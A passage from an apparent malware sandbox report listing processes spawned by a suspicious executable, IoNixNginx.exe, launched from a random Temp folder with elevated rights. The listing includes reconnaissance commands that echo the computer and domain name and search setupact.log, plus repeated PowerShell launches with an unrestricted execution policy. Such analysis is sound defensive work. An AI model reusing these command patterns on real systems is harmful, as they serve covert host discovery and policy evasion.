                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:17
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:18
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:19
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:10:31:42
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:24
                                                                                                                                                                      Start time:10:31:44
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff78f3a0000
                                                                                                                                                                      File size:160'084'992 bytes
                                                                                                                                                                      MD5 hash:4DE03596272B7D7B70FF34893D072F21
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:25
                                                                                                                                                                      Start time:10:31:43
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:26
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                      Imagebase:0x7ff7abc30000
                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:10:31:50
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                      Imagebase:0x7ff6e14e0000
                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:29
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:30
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:35
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:37
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:42
                                                                                                                                                                      Start time:10:31:51
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:45
                                                                                                                                                                      Start time:10:32:04
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:46
                                                                                                                                                                      Start time:10:32:04
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:47
                                                                                                                                                                      Start time:10:32:06
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:48
                                                                                                                                                                      Start time:10:32:06
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:49
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:50
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:51
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:52
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:53
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:54
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:55
                                                                                                                                                                      Start time:10:32:07
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:56
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:57
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:58
                                                                                                                                                                      Start time:10:32:08
                                                                                                                                                                      Start date:13/12/2024
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
